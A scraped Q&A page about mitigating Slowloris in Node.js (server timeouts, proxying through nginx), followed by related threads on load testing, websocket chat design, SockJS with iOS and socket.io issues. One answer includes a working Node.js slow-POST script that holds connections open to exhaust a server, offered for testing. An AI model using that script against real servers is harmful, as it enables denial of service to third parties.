How to mitigate Slowloris in Node.js?

Update:
https://nodejs.org/pt-br/blog/vulnerability/february-2019-security-releases/
Update, Friday the 13th, 2018:
I managed to convince the Node.js core team to assign a CVE for this.
The fix (new defaults and probably a new API) will be there in 1 or 2 weeks.
To mitigate means to lessen the impact of an attack.
Everybody knows Slowloris:
HTTP header or POST body characters are transmitted slowly to keep the socket occupied.
Done at scale, that makes for a cheap DoS attack.
**In NGINX the mitigation is built in:**
> Closing Slow Connections
> You can close connections that are writing
> data too infrequently, which can represent an attempt to keep
> connections open as long as possible (thus reducing the server’s
> ability to accept new connections). Slowloris is an example of this
> type of attack. The client_body_timeout directive controls how long
> NGINX waits between writes of the client body, and the
> client_header_timeout directive controls how long NGINX waits between
> writes of client headers. The default for both directives is 60
> seconds. This example configures NGINX to wait no more than 5 seconds
> between writes from the client for either headers or body.
https://www.nginx.com/blog/mitigating-ddos-attacks-with-nginx-and-nginx-plus/
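(The example referred to in the quote amounts to setting client_header_timeout 5s; and client_body_timeout 5s; in the server block, per the directive names and the 5-second value given in the quoted prose.)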
Since there is no built-in way to act on the headers in the Node.js HTTP server, I came to the question of whether I can combine net and an HTTP server to mitigate Slowloris.
The idea is to `destroy` the `connection` when Slowloris-like behavior shows up:
http.createServer(function(req, res) {
  var timeout;
  req.connection.on('data', function(chunk) {
    clearTimeout(timeout);
    // destroy the socket if the next chunk does not arrive in time
    timeout = setTimeout(function() {
      req.connection.destroy();
    }, 100);
  });
});
The problem I can see is that both services would have to listen on the same socket, on ports 80 and 443.
I do not know how to tackle this.
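One way around this, sketched below under the assumption that nothing beyond Node's core http module is used: http.Server is itself a net.Server, so it already emits a 'connection' event with the raw socket, and no second listener on the port is needed. The 5-second value mirrors the NGINX example above and is illustrative.
var http = require('http');
var server = http.createServer(function(req, res) {
  res.end('Hello.');
});
// The HTTP server owns the raw TCP socket, so slow clients can be
// policed here without a separate net server on the same port.
server.on('connection', function(socket) {
  var timer;
  socket.on('data', function() {
    clearTimeout(timer);
    // If the client pauses longer than 5 seconds between chunks,
    // treat it as a slow client and drop the connection.
    timer = setTimeout(function() {
      socket.destroy();
    }, 5000);
  });
  // A client that never sends anything at all is still bounded by
  // the server's idle timeout (see the setTimeout answer below).
  socket.on('close', function() {
    clearTimeout(timer);
  });
});
server.listen(80);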
It is possible to relay requests and responses between net and an HTTP server and back, but that takes 2 sockets for 1 incoming message and 2 sockets for 1 outgoing message, so it is not feasible for a highly available server.
I have no clue.
What can the world do to get rid of this scourge?
There is a CVE for Apache Tomcat.
This is a serious security threat.
I think this wants to be solved at the C or C++ level.
I cannot write those real programmer languages.
But all of us would be helped if somebody pushed this on GitHub.
Because the community there once deleted my thread about mitigating Slowloris.

The best way to mitigate this issue, as well as a number of other issues, is to place a proxy layer such as nginx, or a firewall, between the node.js application and the internet.
If you're familiar with the paradigms behind many design and programming approaches, such as OOP, you will probably recognize the importance of "separation of concerns".
The same paradigm holds true when designing the infrastructure, or the way clients can access data.
The application should have only one concern: handling data operations (CRUD). This inherently includes any concerns that relate to maintaining data integrity (SQL injection threats, script injection threats, etc.).
Other concerns should be placed in a separate layer, such as an nginx proxy layer.
For example, nginx will often be concerned with routing traffic to your application and load balancing. This includes security concerns related to network connections, such as SSL/TLS negotiation and slow clients.
An extra firewall might (read: should) be implemented to handle additional security concerns.
The solution for your issue is simple: do not directly expose the node.js application to the internet; use a proxy layer - it exists for a reason.
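As a sketch of what "not directly exposed" means in practice (the port and the choice of loopback address are illustrative), bind the Node.js app to the local interface only, so the proxy is the sole way in:
var http = require('http');
var app = http.createServer(function(req, res) {
  res.end('Hello through the proxy.');
});
// Listening on 127.0.0.1 means only local processes (e.g. an nginx
// proxy on the same host) can reach the application directly.
app.listen(3000, '127.0.0.1');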

I think you're taking the wrong approach to this vulnerability.
This doesn't deal with a DDoS attack (Distributed Denial of Service), where many IPs are used and you need to continue serving some machines that sit behind the same firewall as machines involved in the attack.
Often, machines used in a DDoS aren't real machines that have been taken over (they may be virtualized, or running software that attacks from different IPs).
When a DDoS against a large target starts, per-IP throttling may ban all machines from the same firewalled LAN.
To continue providing service in the face of a DDoS, you really need to block requests based on common elements of the request itself, not just the IP. security.se may be the best forum for specific advice on how to do that.
Unfortunately, DoS attacks, unlike XSRF, don't need to originate from real browsers, so any headers that don't contain closely-held and unguessable nonces can be spoofed.
The recommendation: to prevent this issue, you have to have good firewall policies against DDoS attacks and massive denial of service.
BUT! If you want to test a denial of service against node.js, you can use this code (for test purposes only, not for a production environment):
var net = require('net');
var maxConnections = 30;
var connections = [];
var host = "127.0.0.1";
var port = 80;
function Connection(h, p)
{
this.state = 'active';
this.t = Date.now();
this.client = net.connect({port:p, host:h}, () => {
process.stdout.write("Connected, Sending... ");
this.client.write("POST / HTTP/1.1\r\nHost: "+host+"\r\n" +
"Content-Type: application/x-www-form-urlenconded\r\n" +
"Content-Length: 385\r\n\r\nvx=321&d1=fire&l");
process.stdout.write("Written.\n");
});
this.client.on('data', (data) => {
console.log("\t-Received "+data.length+" bytes...");
this.client.end();
});
this.client.on('end', () => {
var d = Date.now() - this.t;
this.state = 'ended';
console.log("\t-Disconnected (duration: " +
(d/1000).toFixed(3) +
" seconds, remaining open: " +
connections.length +
").");
});
this.client.on('error', () => {
this.state = 'error';
});
connections.push(this);
}
setInterval(() => {
var notify = false;
// Add another connection if we haven't reached
// our max:
if(connections.length < maxConnections)
{
new Connection(host, port);
notify = true;
}
// Remove dead connections
connections = connections.filter(function(v) {
return v.state=='active';
});
if(notify)
{
console.log("Active connections: " + connections.length +
" / " + maxConnections);
}
}, 500);

It is as easy as this:
var http = require('http');
var server = http.createServer(function(req, res) {
  res.end('Now.'); // plain http has no res.send(); that's Express
});
// Destroy sockets that are idle for more than 10 ms
// (aggressively short, for demonstration).
server.setTimeout(10);
server.listen(80, '127.0.0.1');
server.setTimeout([msecs][, callback])
By default, the Server's timeout value is 2 minutes, and sockets are
destroyed automatically if they time out.
https://nodejs.org/api/http.html#http_server_settimeout_msecs_callback
Tested with:
var net = require('net');
var client = new net.Socket();
client.connect(80, '127.0.0.1', function() {
setInterval(function() {
client.write('Hello World.');
},10000)
});
This is only the second-best solution, since legitimate slow connections get terminated as well.
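For reference, the security releases linked in the update at the top later added per-phase limits that separate slow-header clients from legitimately slow requests. A sketch; the values are illustrative, and requestTimeout only exists in newer Node versions:
var http = require('http');
var server = http.createServer(function(req, res) {
  res.end('Now.');
});
// Bound how long a client may take to finish sending the headers.
server.headersTimeout = 40000; // 40 seconds
// Newer Node versions can also bound the entire request.
server.requestTimeout = 300000; // 5 minutes
server.listen(80, '127.0.0.1');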

Related

Why does increasing worker_connections in Nginx make the application slower in a node.js cluster?

I'm transforming my application to a node.js cluster, which I hope will boost its performance.
Currently, I'm deploying the application to 2 EC2 t2.medium instances. I have Nginx as a proxy and ELB.
This is my express cluster application which is pretty standard from the documentation.
var bodyParser = require('body-parser');
var cors = require('cors');
var cluster = require('cluster');
var debug = require('debug')('expressapp');
if(cluster.isMaster) {
var numWorkers = require('os').cpus().length;
debug('Master cluster setting up ' + numWorkers + ' workers');
for(var i = 0; i < numWorkers; i++) {
cluster.fork();
}
cluster.on('online', function(worker) {
debug('Worker ' + worker.process.pid + ' is online');
});
cluster.on('exit', function(worker, code, signal) {
debug('Worker ' + worker.process.pid + ' died with code: ' + code + ', and signal: ' + signal);
debug('Starting a new worker');
cluster.fork();
});
} else {
// Express stuff
}
This is my Nginx configuration.
nginx::worker_processes: "%{::processorcount}"
nginx::worker_connections: '1024'
nginx::keepalive_timeout: '65'
I have 2 CPUs on Nginx server.
This is my performance before:
I get 1,500 requests/s, which is pretty good. Now I thought I would increase the number of connections on Nginx so I could accept more requests. I do this:
nginx::worker_processes: "%{::processorcount}"
nginx::worker_connections: '2048'
nginx::keepalive_timeout: '65'
And this is my performance after, which I think is worse than before.
I use Gatling for performance testing, and here's the code:
import io.gatling.core.Predef._
import io.gatling.http.Predef._
import scala.concurrent.duration._
class LoadTestSparrowCapture extends Simulation {
val httpConf = http
.baseURL("http://ELB")
.acceptHeader("application/json")
.doNotTrackHeader("1")
.acceptLanguageHeader("en-US,en;q=0.5")
.acceptEncodingHeader("gzip, deflate")
.userAgentHeader("Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20100101 Firefox/16.0")
val headers_10 = Map("Content-Type" -> "application/json")
val scn = scenario("Load Test")
.exec(http("request_1")
.get("/track"))
setUp(
scn.inject(
atOnceUsers(15000)
).protocols(httpConf))
}
I deployed this to my Gatling cluster. So, I have 3 EC2 instances firing 15,000 requests in 30 s at my application.
The question is: is there anything I can do to increase the performance of my application, or do I just need to add more machines?
The route that I'm testing is pretty simple, I get the request and send it off to RabbitMQ so it can be processed further. So, the response of that route is pretty fast.
You've mentioned that you are using AWS with an ELB in front of your EC2 instances. As I see, you are getting 502 and 503 status codes. These can be sent from the ELB or from your EC2 instances. Make sure that when doing the load test you know where the errors are coming from. You can check this in the AWS console, in the ELB CloudWatch metrics.
Basically, HTTPCode_ELB_5XX means your ELB sent the 50x; HTTPCode_Backend_5XX means your backend sent the 50x. You can also verify that in the ELB logs. A better explanation of ELB errors can be found here.
To load-test on AWS you should definitely read this. The point is that the ELB is just another set of machines, which needs to scale if your load increases. The default scaling strategy is (cited from the section "Ramping Up Testing"):
Once you have a testing tool in place, you will need to define the growth in the load. We recommend that you increase the load at a rate of no more than 50 percent every five minutes.
That means that when you start at some number of concurrent users, let's say 1,000, by default you should increase only up to 1,500 within 5 minutes. This guarantees that the ELB will scale with the load on your servers. Exact numbers may vary, and you have to test them on your own. Last time I tested, it sustained a load of 1,200 req/s without an issue, and then I started to receive 50x errors. You can test this easily by running a ramp-up scenario from X to Y users from a single client and waiting for the 50x.
The next very important thing (from the section "DNS Resolution") is:
If clients do not re-resolve the DNS at least once per minute, then the new resources Elastic Load Balancing adds to DNS will not be used by clients.
In short, this means that you have to guarantee that the TTL in DNS is respected, or that your clients re-resolve and rotate the DNS IPs they receive from DNS lookups, to guarantee a round-robin distribution of the load. If not (e.g. when testing from only one client; not your case), you can skew the results by targeting all the traffic at one instance of the ELB and overloading it. That means the ELB will not scale at all.
Hope this helps.

What is the best technology for a chat/shoutbox system? Plain JS, JQuery, Websockets, or other?

I have an old site running, which also has a chat system, which always used to work fine. But recently I picked up the project again and started improving and the user base has been increasing a lot. (running on a VPS)
Now this shoutbox I have (running at http://businessgame.be/shoutbox) has been having issues lately: when there are over 30 people online at the same time, it starts to really slow down the entire site.
This shoutbox system was written years ago by the old me (which ironically was the young me) who was way too much into old school Plain Old JavaScript (POJS?) and refused to use frameworks like JQuery.
What I do is poll with AJAX every 3 seconds for new messages, and if there are any, load all of them (they are delivered as an XML file, which the JS code then parses into HTML blocks that are added to the shoutbox content).
Simplified the script is like this:
The AJAX functions
function createRequestObject() {
var xmlhttp;
if (window.XMLHttpRequest) { // code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp = new XMLHttpRequest();
} else { // code for IE6, IE5
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
// Create the object
return xmlhttp;
}
function getXMLObject(XMLUrl, onComplete, onFail) {
var XMLhttp = createRequestObject();
// Check to see if the latest shout time has been initialized
if(typeof getXMLObject.counter == "undefined") {
getXMLObject.counter = 0;
}
getXMLObject.counter++;
XMLhttp.onreadystatechange = function() {
if(XMLhttp.readyState == 4) {
if(XMLhttp.status == 200) {
if(onComplete) {
onComplete(XMLhttp.responseXML);
}
} else {
if(onFail) {
onFail();
}
}
}
};
XMLhttp.open("GET", XMLUrl, true);
XMLhttp.send();
setTimeout(function() {
if(typeof XMLhttp != "undefined" && XMLhttp.readyState != 4) {
XMLhttp.abort();
if(onFail) {
onFail();
}
}
}, 5000);
}
Chat functions
function initShoutBox() {
  // Check for new shouts every 3 seconds
  shoutBoxInterval = setInterval(shoutBoxUpdate, 3000);
}
function shoutBoxUpdate() {
// Get the XML document
getXMLObject("/ajax/shoutbox/shoutbox.xml?time=" + shoutBoxAppend.lastShoutTime, shoutBoxAppend);
}
function shoutBoxAppend(xmlData) {
  // process all the XML and add it to the content;
  // also remember the timestamp of the newest shout
}
The real script is far more convoluted, with slower polling when the page is blurred, bookkeeping of AJAX calls to avoid simultaneous double calls, the ability to post a shout, loading of settings, etc. All not very relevant here.
For those interested, full codes here:
http://businessgame.be/javascripts/xml.js
http://businessgame.be/javascripts/shout.js
Example of the XML file containing the shout data
http://businessgame.be/ajax/shoutbox/shoutbox.xml?time=0
I do the same for getting a list of the online users every 30 seconds and checking for new private messages every 2 minutes.
My main question is: since this old-school JS is slowing down my site, will changing the code to JQuery increase the performance and fix this issue? Or should I go for another technology altogether, like nodeJS, websockets, or something else? Or maybe I am overlooking a fundamental bug in this old code?
Rewriting an entire chat and private messages system (which share the same backend) requires a lot of effort, so I'd like to do this right from the start, not rewrite the whole thing in JQuery just to find out it doesn't solve the issue at hand.
Having 30 people online in the chatbox at the same time is not really an exception anymore, so it should be a robust system.
Could perhaps changing from XML data files to JSON increase performance as well?
PS: Backend is PHP MySQL
I'm biased, as I love Ruby and I prefer using Plain JS over JQuery and other frameworks.
I believe you're wasting a lot of resources by using AJAX and should move to websockets for your use-case.
30 users is not much... When using websockets, I would assume a single server process should be able to serve thousands of simultaneous updates per second.
The main reason for this is that websockets are persistent (no authentication happening with every request) and broadcasting to a multitude of connections will use the same amount of database queries as a single AJAX update.
In your case, instead of everyone reading the whole XML every time, a POST event will broadcast only the latest (posted) shout (not the whole XML) and store it in the XML for persistence (used for new visitors).
Also, you don't need all the authentication and requests that end up being answered with a "No, there aren't any pending updates".
Minimizing the database requests (XML reads) should prove to be a huge benefit when moving from AJAX to websockets.
Another benefit relates to the fact that enough simultaneous users will make AJAX polling behave like a DoS attack.
Right now, 30 users == 10 requests per second. This isn't much, but it can be heavy if each request takes more than 100 ms - meaning the server would be answering fewer requests than it receives.
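For comparison with the Ruby example below, here is roughly what the same push-only broadcast could look like in Node.js. This is a sketch assuming the third-party ws package (npm install ws); the port and message handling are illustrative:
var WebSocket = require('ws');
var wss = new WebSocket.Server({ port: 8080 });

wss.on('connection', function(socket) {
  socket.on('message', function(data) {
    // One incoming shout is pushed to every open client;
    // nobody polls, so idle users cost almost nothing.
    wss.clients.forEach(function(client) {
      if (client.readyState === WebSocket.OPEN) {
        client.send(String(data));
      }
    });
  });
});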
The home page for the Plezi Ruby Websocket Framework has this short example for a shout box (I'm Plezi's author, I'm biased):
# finish with `exit` if running within `irb`
require 'plezi'
class ChatServer
def index
render :client
end
def on_open
return close unless params[:id] # authentication demo
broadcast :print,
"#{params[:id]} joind the chat."
print "Welcome, #{params[:id]}!"
end
def on_close
broadcast :print,
"#{params[:id]} left the chat."
end
def on_message data
self.class.broadcast :print,
"#{params[:id]}: #{data}"
end
protected
def print data
write ::ERB::Util.html_escape(data)
end
end
path_to_client = File.expand_path( File.dirname(__FILE__) )
host templates: path_to_client
route '/', ChatServer
The POJS client looks like so (the DOM update and form data access ($('#text')[0].value) use JQuery):
ws = NaN
handle = ''
function onsubmit(e) {
e.preventDefault();
if($('#text')[0].value == '') {return false}
if(ws && ws.readyState == 1) {
ws.send($('#text')[0].value);
$('#text')[0].value = '';
} else {
handle = $('#text')[0].value
var url = (window.location.protocol.match(/https/) ? 'wss' : 'ws') +
'://' + window.document.location.host +
'/' + $('#text')[0].value
ws = new WebSocket(url)
ws.onopen = function(e) {
output("<b>Connected :-)</b>");
$('#text')[0].value = '';
$('#text')[0].placeholder = 'your message';
}
ws.onclose = function(e) {
output("<b>Disonnected :-/</b>")
$('#text')[0].value = '';
$('#text')[0].placeholder = 'nickname';
$('#text')[0].value = handle
}
ws.onmessage = function(e) {
output(e.data);
}
}
return false;
}
function output(data) {
$('#output').append("<li>" + data + "</li>")
$('#output').animate({ scrollTop:
$('#output')[0].scrollHeight }, "slow");
}
If you want to add more events or data, you can consider using Plezi's auto-dispatch feature, that also provides you with an easy to use lightweight Javascript client with an AJAJ (AJAX + JSON) fallback.
...
But, depending on your server's architecture and on whether you mind using heavier frameworks, you can use the more common socket.io (although it starts with AJAX and only moves to websockets after a warm-up period).
EDIT
Changing from XML to JSON will still require parsing. The question is really one of XML vs. JSON parsing speed.
JSON will be faster on the client javascript, according to the following SO question and answer: Is parsing JSON faster than parsing XML
JSON seems to be also favored on the server-side for PHP (might be opinion based rather than tested): PHP: is JSON or XML parser faster?
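For concreteness, the two client-side parse paths look roughly like this (the shout format here is illustrative, not the actual one from the site):
// XML: parse the string, then walk the resulting DOM
var xmlDoc = new DOMParser().parseFromString(
  '<shouts><shout time="1">hi</shout></shouts>', 'text/xml');
var fromXml = xmlDoc.getElementsByTagName('shout')[0].textContent;

// JSON: parse straight into plain JavaScript objects
var shouts = JSON.parse('[{"time": 1, "text": "hi"}]');
var fromJson = shouts[0].text;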
BUT... I really think your bottleneck isn't the JSON or the XML. I believe the bottleneck relates to the multitude of times the data is accessed, (parsed?) and reviewed by the server when using AJAX.
EDIT2 (due to comment about PHP vs. node.js)
You can add a PHP websocket layer using Ratchet... although PHP wasn't designed for long-running processes, so I would consider adding a dedicated websocket stack (using a local proxy to route websocket connections to a different application).
I love Ruby since it allows you to quickly and easily code a solution. Node.js is also commonly used as a dedicated websocket stack.
I would personally avoid socket.io, because it abstracts the connection method (AJAX vs. websockets) and always starts as AJAX before "warming up" to an "upgrade" (websockets)... Also, socket.io uses long polling when not using websockets, which I think is terrible. I'd rather show a message telling the client to upgrade their browser.
Jonny Whatshisface pointed out that using a node.js solution he reached a limit of ~50K concurrent users (which could be related to the local proxy's connection limit). Using a C solution, he states he has no issues with more than 200K concurrent users.
This obviously also depends on the number of updates per second and on whether you're broadcasting the data or sending it to specific clients... If you're sending 2 updates per user per second for 200K users, that's 400K updates per second. However, updating all the users only once every 2 seconds is 100K updates per second. So trying to figure out the maximum load can be a headache.
Personally, I didn't get to reach these numbers on my apps, so I never discovered Plezi's limits first-hand... although, during testing, I had no issues sending hundreds of thousands of updates per second (but I did have a connection limit due to available ports and open file handle limits on my local machine).
This definitely shows how vast an improvement you can reach by utilizing websockets (especially since you stated that you notice slowdowns with 30 concurrent users).

What Websocket library for a Node.js server works best with iOS clients?

On the iOS clients, I'm using SocketRocket by Square: https://github.com/square/SocketRocket
Everywhere I have looked, I have found comparisons of Websocket libraries based on web applications accessed from browser, or queried in a database, but nothing as yet for clients that are iOS smartphone apps.
The clients would connect to the remote server on request through the app (i.e. the connection isn't "always-on" or done through a mobile browser or proxy or GameCenter), and, once connected, be paired with other clients in a two-player "game" situation. Until a match ends, the connection would need to persist, and the server would be responsible for timing each user's turn and receiving & issuing commands from/to each user, sort of like a turn-based game except each turn has a server-managed time limit. After a match ends (generally 15-20 minutes), if a user doesn't want another match with another random opponent, then the connection would be closed and the user logged off; users that want to continue would then be matched with another user by the hosting server (running Node.js and the Websocket library).
Some of the options I have considered include
Socket.IO 1.0: http://socket.io/
Sockjs: https://github.com/sockjs
ws: https://github.com/einaros/ws
nodejs-websocket: https://www.npmjs.com/package/nodejs-websocket
but heard from https://medium.com/@denizozger/finding-the-right-node-js-websocket-implementation-b63bfca0539 that Socket.IO isn't optimal for heavy user traffic (and I'm anticipating more than 300 users requesting matches at any one point), and that Sockjs doesn't have some command query feature, but didn't quite find a conclusive answer in the context of smartphones or iOS devices -- not browsers -- either way, in any situation.
The question is: which Node.js server Websocket library would play nicest, with the fewest stability/scalability/complexity concerns, with iOS clients running SocketRocket? The SocketRocket wiki itself isn't helpful, as it uses a Python/Go-based server-side test.
EDIT: Potentially helpful resource:
http://www.teehanlax.com/blog/how-to-socket-io-swift/
The only missing thing is a comparison or discussion of other potential websocket APIs, not just Socket.IO. But it is a start, in that it seems to work with the latest iOS, SocketRocket, and Socket.IO builds.
I like Sockjs because it is simple. Here is an implementation of SocketRocket --> Sockjs that works as a proof of concept.
NEED:
- SocketRocket (add libicucore.dylib, Security.framework and CFNetwork.framework to your project)
- Node.js
- Sockjs Server
SERVER:
var http = require('http'),
sockjs = require('sockjs'),
sockserver = sockjs.createServer(),
connections = [];
sockserver.on('connection', function(conn) {
console.log('Connected');
connections.push(conn);
conn.on('data', function(message) {
console.log('Message: ' + message);
// send the message to all clients
for (var i=0; i < connections.length; ++i) {
connections[i].write(message);
}
//
});
conn.on('close', function() {
connections.splice(connections.indexOf(conn), 1); // remove the connection
console.log('Disconnected');
});
});
var server = http.createServer();
sockserver.installHandlers(server, {prefix:'/sockserver'});
server.listen(3000, '0.0.0.0'); // http://localhost:3000/sockserver/websocket
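(As a quick sanity check before wiring up the iOS client, any generic websocket client can connect to the raw endpoint SockJS exposes at ws://localhost:3000/sockserver/websocket, the URL noted in the comment above.)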
CLIENT (ViewController.m):
#import "ViewController.h"
@interface ViewController ()
@end
@implementation ViewController
{
SRWebSocket *myWebSocket;
__weak IBOutlet UILabel *connectionStatus;
__weak IBOutlet UITextView *myTextView;
}
- (void)viewDidLoad {
[super viewDidLoad];
connectionStatus.textColor = [UIColor redColor];
myWebSocket = [[SRWebSocket alloc] initWithURL:[[NSURL alloc] initWithString:@"http://localhost:3000/sockserver/websocket"]];
myWebSocket.delegate = self;
[myWebSocket open];
}
- (void)didReceiveMemoryWarning {
[super didReceiveMemoryWarning];
// Dispose of any resources that can be recreated.
}
- (void)webSocket:(SRWebSocket *)webSocket didReceiveMessage:(id)message{
myTextView.text = message;
NSLog(#"message: %#",message);
}
- (void)webSocket:(SRWebSocket *)webSocket didCloseWithCode:(NSInteger)code reason:(NSString *)reason wasClean:(BOOL)wasClean{
connectionStatus.text = #"Disconnected";
connectionStatus.textColor = [UIColor redColor];
}
- (void)webSocketDidOpen:(SRWebSocket *)webSocket{
connectionStatus.text = #"Connected";
connectionStatus.textColor = [UIColor greenColor];
}
- (void)webSocket:(SRWebSocket *)webSocket didFailWithError:(NSError *)error{
}
@end
src: http://nunoferro.pt/?p=22

Node.js / Server.js socket implementation problems

Having a hard time implementing a node.js/server.js setup
I'm a bit stuck right now and hoping someone can shed some light. I'm relatively new to sockets in general, but have been programming in javascript on and off for several years, although only as deep as is necessary to accomplish the task at hand. As a result, my understanding of some of the concepts surrounding the javascript stack and heap, and sockets in general, is somewhat limited.
Ok Here's the situation:
I've created an application intended to simply increment a counter on several machines. Several users can click the "next" button, and it will update instantly on all machines.
When you first connect, it retrieves the current number, and spits it out locally.
I've created the server here:
var io = require("socket.io");
var sockets = io.listen(8000);
var currentlyServing=0;
sockets.on("connection", function (socket)
{
console.log("client connected");
socket.emit("receive", currentlyServing);
socket.on("update", function(serving)
{
currentlyServing=serving;
if(currentlyServing>100)
currentlyServing=0;
if(currentlyServing<0)
currentlyServing=99;
socket.broadcast.emit("receive", currentlyServing);
console.log("update received: "+currentlyServing);
});
});
console.log("Server Started");
Here is the relevant (I hope) excerpt from the client side:
var socket = io.connect("http://www.sampledomain.com:8000");
//function to update the page when a new update is received
socket.on("receive", function(receivedServing)
{
document.getElementById('msgs').value=""+String("00" + receivedServing).slice(-2);
document.getElementById('nowServing').value=receivedServing;
});
//this is called in an onClick event in the HTML source
//sends the new number to all other stations except this one (handled by server side)
function nextServing()
{
var sendServing = parseInt(document.getElementById('nowServing').value)+1;
socket.emit("update", sendServing);
document.getElementById('nowServing').value=sendServing;
document.getElementById('msgs').value=""+String("00" + sendServing).slice(-2);
}
Ok so here's my problem. This runs absolutely fine on every system I've put it on, smoothly and beautifully - except for IE8. If left alone for more than 2-3 minutes (with no activity at all), I eventually receive a "stack overflow" error. The line number it appears on fluctuates (I haven't determined the factors involved yet), but it always happens at that interval. On some workstations it takes longer, which I'm beginning to think correlates directly with the amount of physical RAM the machine has, or at least how much is allocated to the web browser.
I found an online function to determine "max stack size", which I realize is not an exact science; however, I did consistently get a number in the area of 3,000. On my IE11 machine, with considerably more resources, I found it to be in the area of 20,000. This may not be relevant, but I figured the more info the better :)
To avoid this problem for now, so that the end users don't see the error message, I've taken the entire client script and put it into an iFrame which reloads itself every 60 seconds, essentially resetting the stack. That feels so dirty sitting so close to a web socket, but it has bought me the time to post here. I've googled until I can't google any more, but when you search "node.js" or "socket.io" along with "stack overflow" on Google, you just get a lot of posts about the two topics that are hosted on the stackoverflow dot com website. ARG lol
Anyone?
EDIT ON NOVEMBER 18TH, 2014, AS PER COMMENTS BELOW:
The error message most often claims a stack overflow at line 1056. IE Developer Tools points to the file socket.io.js. Line 1056 is:
return fn.apply(obj, args.concat(slice.call(arguments)));
which is inside this section of the file:
var slice = [].slice;
/**
 * Bind `obj` to `fn`.
 *
 * @param {Object} obj
 * @param {Function|String} fn or string
 * @return {Function}
 * @api public
 */
module.exports = function(obj, fn){
if ('string' == typeof fn) fn = obj[fn];
if ('function' != typeof fn) throw new Error('bind() requires a function');
var args = slice.call(arguments, 2);
return function(){
return fn.apply(obj, args.concat(slice.call(arguments)));
}
};
From what I've read, it seems that the problem on IE8 might be related to Flash: IE8 uses flashsocket as the default transport. I suggest trying the following on the client side:
if(navigator.appName.indexOf("Internet Explorer")!=-1 && navigator.appVersion.indexOf("MSIE 8")!=-1 ){
  // IE8 detected: force long polling instead of flashsocket
  socket = io.connect("http://www.sampledomain.com:8000", {
    transports: ['xhr-polling']
  });
}
else
{
  socket = io.connect("http://www.sampledomain.com:8000");
}
This should make IE8 use long polling while all other machines use the best method they can.
On a side note: You might also want to consider incrementing the "serving" variable on the server.
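A sketch of that server-side increment, registered inside the existing connection handler (the event name "next" is hypothetical; it would replace the client-computed "update" event):
socket.on("next", function() {
  // The server owns the counter, so clients cannot race each
  // other or push arbitrary values.
  currentlyServing++;
  if(currentlyServing > 100)
    currentlyServing = 0;
  // Same emit calls the original handler already uses: echo to
  // the requester and broadcast to everyone else.
  socket.emit("receive", currentlyServing);
  socket.broadcast.emit("receive", currentlyServing);
});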
See the existing issue "Causes a 'Stack Overflow' in IE8 when using xhr-polling" (#385). This was fixed by disabling Flash.
Also see "Safari over windows client use xhr-polling instead of websocket - performance are severely harm" (#1147). While this is Safari, it may apply to IE8 because it uses a similar mechanism.
I did a small test using your socket.io setup, but in IE10 with emulated IE8 so that I could debug well. I started capturing network traffic in the tab and noticed requests being logged every few seconds. Left alone for a few minutes, I saw a lot of requests logged. You will not see this in Chrome, because it has true WebSockets. While IE8 does not support WebSockets, socket.io emulates them using plain HTTP GET/POST through some mechanism. So my theory is that even if socket.io works with IE8, it does not reliably emulate web sockets.
My advice is to rule out IE8 for long-running client applications. IE8 is no longer supported by Microsoft.
Maybe try to replace
""+String("00" + receivedServing).slice(-2)
with
('00' + receivedServing).slice(-2)

Poor network performance with Websockets running on apple device

I am working on an HTML/Javascript application running on mobile devices that communicates with a Qt/C++ application running on a PC. Both the mobile device and the PC are on a local network. The communication between the HTML page (client) and the C++ app (server) is done using Websockets.
The HTML page is a remote control for the C++ application, so a low-latency connection between the mobile device and the PC is needed.
When using any non-Apple device as a client, data is sent at a rate between 60 and 120 frames/sec, which is totally acceptable. When using an Apple device, this rate falls to 3-4 frames/sec.
I also checked ping times (Websocket implementation, not a ping command from the command line). They are acceptable (1-5 ms) for Apple devices as long as the device is not transmitting data. Whenever it transmits data, the ping time rises to 200 ms.
Looking from the Javascript side, the Apple devices always send data at a consistent rate of 60 frames/sec, as any other device does. However, on the server side, only 3 to 4 of these 60 frames are received each second when the client is an Apple device.
Does anyone have any idea on what can be happening?
Here is my Javascript code :
<script language="javascript" type="text/javascript">
var wsUri = document.URL.replace("http", "ws");
var output;
var websocket;
function init()
{
output = document.getElementById("output");
wsConnect();
}
function wsConnect()
{
console.log("Trying connection to " + wsUri);
try
{
output = document.getElementById("output");
websocket = new WebSocket(wsUri);
websocket.onopen = function(evt)
{
onOpen(evt)
};
websocket.onclose = function(evt)
{
onClose(evt)
};
websocket.onmessage = function(evt)
{
onMessage(evt)
};
websocket.onerror = function(evt)
{
onError(evt)
};
}
catch (e)
{
console.log("Exception " + e.toString());
}
}
function onOpen(evt)
{
alert("Connected to " + wsUri);
}
function onClose(evt)
{
alert("Disconnected");
}
function onMessage(evt)
{
alert('Received message : ' + evt.data);
}
function onError(evt)
{
alert("Error : " + evt.toString());
}
function doSend(message)
{
websocket.send(message);
}
window.addEventListener("load", init, false);
</script>
Data is sent from the Javascript side using the doSend() function.
A few ideas and suggestions:
Check whether the client's WebSocket protocol version is supported by the server. This question and answer discuss a case where different protocol versions were an issue.
The WebSocket standard permits implementations to arbitrarily delay transmissions and perform fragmentation. Additionally, control frames, such as Ping, do not support fragmentation but are permitted to be interjected. These permitted behavioral differences may be contributing to the difference in times.
Check the bufferedAmount attribute on the WebSocket to determine whether the WebSocket is buffering the data (see the sketch after this list). If the bufferedAmount attribute is often zero, then the data has been passed to the OS, which may be buffering it based on OS or socket configurations, such as Nagle's algorithm.
This question and answer mention resolving delays by having the server send acknowledgements for each message.
To get a deeper view into the interactions, it may be useful to perform a packet trace. This technical Q&A in the Mac Developer Library may provide some resources on how to accomplish this.
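A minimal sketch of the bufferedAmount check suggested above, as a drop-in replacement for the doSend() shown earlier (the zero threshold is illustrative; a small positive threshold also works):
function doSend(message)
{
  // bufferedAmount > 0 means earlier frames are still queued in the
  // browser; sending more would only grow the backlog.
  if (websocket.bufferedAmount > 0)
  {
    console.log("Dropping frame, " + websocket.bufferedAmount +
                " bytes still buffered");
    return;
  }
  websocket.send(message);
}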
The best way to get more insight is to use the AutobahnTestsuite. You can test both clients and servers with that suite and find out where the problems are situated.
I have created QWebSockets, a Qt-based websockets implementation, and have used it on several occasions to create servers. Performance from Apple devices is excellent.
However, there seems to be a severe problem with Safari when it comes to large messages (see https://github.com/KurtPattyn/QWebSockets/wiki/Performance-Tests). Maybe that is the problem.
